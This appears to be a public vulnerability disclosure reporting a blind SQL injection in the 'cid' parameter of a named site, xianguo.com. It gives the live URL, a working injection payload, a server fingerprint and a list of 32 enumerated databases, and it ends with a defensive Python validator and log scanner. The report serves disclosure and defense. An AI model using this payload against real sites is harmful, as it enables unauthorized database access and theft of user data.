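2016-01-15: Details reported to the vendor; awaiting vendor handling
2016-01-20: Vendor chose to ignore the vulnerability; details disclosed to the public
SQL injection vulnerability in a Xianguo (xianguo.com) site
Target: a Xianguo site
http://m3.xianguo.com/homeindex/list?cid=3&tagid=186_31
Injection point: cid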
---
Parameter: cid (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: cid=(SELECT (CASE WHEN (1567=1567) THEN 1567 ELSE 1567*(SELECT 1567 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&tagid=186_31
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9
back-end DBMS: MySQL 5.0

available databases [32]:
[*] analytic
[*] bang
[*] book_new
[*] book_novel
[*] books
[*] client
[*] digital_market
[*] feed
[*] gdcnc
[*] groups
[*] igoli
[*] information_schema
[*] life_stream
[*] life_stream_doings
[*] life_stream_doings_meta
[*] life_stream_follow
[*] life_stream_link
[*] life_stream_publicline
[*] metadata
[*] mysql
[*] novel_spider
[*] partner
[*] recommend
[*] remark
[*] samsung
[*] short_url
[*] snslog
[*] spider
[*] taggroup
[*] test
[*] user
[*] wordpress
Stopping here; please fix this as soon as possible~
Filter the input~
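The fix suggested above is input filtering. As an added example (not part of the original report), this Python sketch applies an allow-list to the two parameters in the reported URL and reuses the same check to flag non-conforming requests in an access log. The value formats for cid and tagid are assumptions inferred from the URL on this page, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed formats, inferred from the URL in the report:
# cid is a small integer, tagid is two integers joined by "_".
RULES = {"cid": re.compile(r"[0-9]{1,9}"), "tagid": re.compile(r"[0-9]+_[0-9]+")}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[0-9.]+"')


def check_params(url):
    """Return a list of (name, value) pairs that break the allow-list."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    bad = []
    for name, rule in RULES.items():
        # parse_qs keeps every occurrence, so a duplicated parameter
        # (cid=3&cid=<expr>) cannot hide behind a clean first value.
        for value in query.get(name, []):
            if not rule.fullmatch(value):
                bad.append((name, value))
    return bad


def scan_access_log(lines, path="/homeindex/list"):
    """Return (client, name, value) for requests to `path` that fail the check."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m or urlsplit(m.group(2)).path != path:
            continue
        hits.extend((m.group(1), n, v) for n, v in check_params(m.group(2)))
    return hits


# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jan/2016:10:00:01 +0800] "GET /homeindex/list?cid=3&tagid=186_31 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [15/Jan/2016:10:00:02 +0800] "GET /homeindex/list?cid=%28SELECT%20%28CASE%20WHEN%20%281567%3D1567%29%20THEN%201567%20ELSE%200%20END%29%29&tagid=186_31 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [15/Jan/2016:10:00:03 +0800] "GET /homeindex/list?cid=3&cid=3-0&tagid=186_31 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [15/Jan/2016:10:00:04 +0800] "GET /other?cid=abc HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for client, name, value in scan_access_log(SAMPLE_LOG):
        print(f"{client} {name}={value!r}")
```

Rejecting such requests at the application edge complements, and does not replace, bound parameters in the PHP query itself.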
Severity: no impact (ignored by vendor)
Ignored at: 2016-01-20 21:30
Vulnerability Rank: 4 (WooYun rating)
None yet